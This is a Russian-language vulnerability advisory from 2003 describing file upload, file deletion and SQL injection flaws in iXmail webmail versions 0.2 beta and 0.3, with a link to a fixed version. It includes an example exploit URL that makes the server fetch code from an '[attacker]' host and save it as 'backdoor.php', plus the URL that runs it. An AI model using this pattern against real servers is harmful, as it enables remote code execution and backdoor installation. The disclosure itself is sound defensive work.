Несколько уязвимостей в iXmail web mail системе

Дата публикации:
30.06.2003
Всего просмотров:
1205
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Несколько уязвимостей обнаружены в iXmail web mail  системе. Удаленный пользователь может загружать файлы на сервер и выполнять их. Удаленный пользователь может просматривать и удалять некоторые файлы на сервере и внедрять SQL команды, чтобы получить авторизованный доступ к приложению. 

1. Удаленный авторизованный пользователь может представить специально обработанные переменные '$attach1' и '$attach1_name' к 'xmail_attach.php' сценарию, чтобы загружать произвольные файлы на систему, включая PHP сценарии. Пример:

http://[target]/ixmail_attach.php?submit=1&attach1=http: //[attacker]/badcode.txt&attach1_name=backdoor.php

В примере выше, файл 'badcode.txt' будет записан в tmp каталог в Web директории как 'backdoor.php' файл. PHP код в 'backdoor.php' может быть выполнен (с привилегиями Web сервера) используюя следующий URL:

http://[target]/tmp/backdoor.php

Удаленный авторизованный пользователь может также загрузить файлы, которые фактически находятся на целевом сервере. В результате удаленный пользователь может копировать файлы в инсталляционном каталоге (например 'include/ixmail_config.inc.php') в tmp каталог в Web директории. В результате пользователь может просматривать ixmail конфигурацию.

2. Уязвимость обнаружена в сценарии 'ixmail_netattach.php'. Сценарий позволяет удаленному авторизованному пользователю удалять произвольные файлы, типа сценариев на сервере.

3. Уязвимость авторизации обнаружена в 'index.php'. Удаленный пользователь может сконструировать специально обработанный запрос, чтобы внедрить SQL команды и получить авторизованный доступ к приложению.

Уязвимость обнаружена в iXmail 0.2 beta, 0.3
Для устранения уязвимости, установите обновленную версию программы, которую можно скачать отсюда:
http://www.a-suivre.net/ixmail/index2.php?page=download



Ссылки: iXmail
или введите имя

CAPTCHA